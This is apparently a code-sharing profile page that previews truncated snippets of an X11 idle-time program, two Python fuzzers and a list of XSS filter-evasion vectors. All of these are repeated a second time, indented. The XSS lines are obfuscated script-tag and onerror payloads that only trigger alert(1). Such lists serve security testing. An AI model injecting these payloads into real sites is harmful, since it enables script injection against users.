Stolas Stolas

## idletime.c
// gcc -Wall idletime.c -o idletime -L/usr/X11R6/lib/ -lX11 -lXext -lXss

#include <stdio.h>
#include <X11/extensions/scrnsaver.h>

int main()
{
	XScreenSaverInfo *info = XScreenSaverAllocInfo();
	Display *display = XOpenDisplay (NULL);
	if (display == NULL) {

## fuzz.py
def none(): return None
objects = ['none', 'bool', 'int', 'float', 'str', 'list', 'dict', 'tuple', 'set', 'object', 'bytes', 'bytearray']

f = open('/dev/urandom', 'rb')
def choice(a):
	i = ord(f.read(1)) % len(a)
	return a[i]

cnt_ok = 0
cnt_ex = 0

## fuzzer.py
#!/usr/bin/python

# 5-line fuzzer below is from Charlie Miller's
# "Babysitting an Army of Monkeys":
# Part 1 - http://www.youtube.com/watch?v=Xnwodi2CBws
# Part 2 - http://www.youtube.com/watch?v=lK5fgCvS2N4
# Presentation at http://www.scribd.com/doc/60008912/cmiller-CSW-2010

# List of files to use as initial seed
file_list=[

## 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
	// gcc -Wall idletime.c -o idletime -L/usr/X11R6/lib/ -lX11 -lXext -lXss

	#include <stdio.h>
	#include <X11/extensions/scrnsaver.h>

	int main()
	{
	XScreenSaverInfo *info = XScreenSaverAllocInfo();
	Display *display = XOpenDisplay (NULL);
	if (display == NULL) {
	def none(): return None
	objects = ['none', 'bool', 'int', 'float', 'str', 'list', 'dict', 'tuple', 'set', 'object', 'bytes', 'bytearray']

	f = open('/dev/urandom', 'rb')
	def choice(a):
	i = ord(f.read(1)) % len(a)
	return a[i]

	cnt_ok = 0
	cnt_ex = 0
	#!/usr/bin/python

	# 5-line fuzzer below is from Charlie Miller's
	# "Babysitting an Army of Monkeys":
	# Part 1 - http://www.youtube.com/watch?v=Xnwodi2CBws
	# Part 2 - http://www.youtube.com/watch?v=lK5fgCvS2N4
	# Presentation at http://www.scribd.com/doc/60008912/cmiller-CSW-2010

	# List of files to use as initial seed
	file_list=[
	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>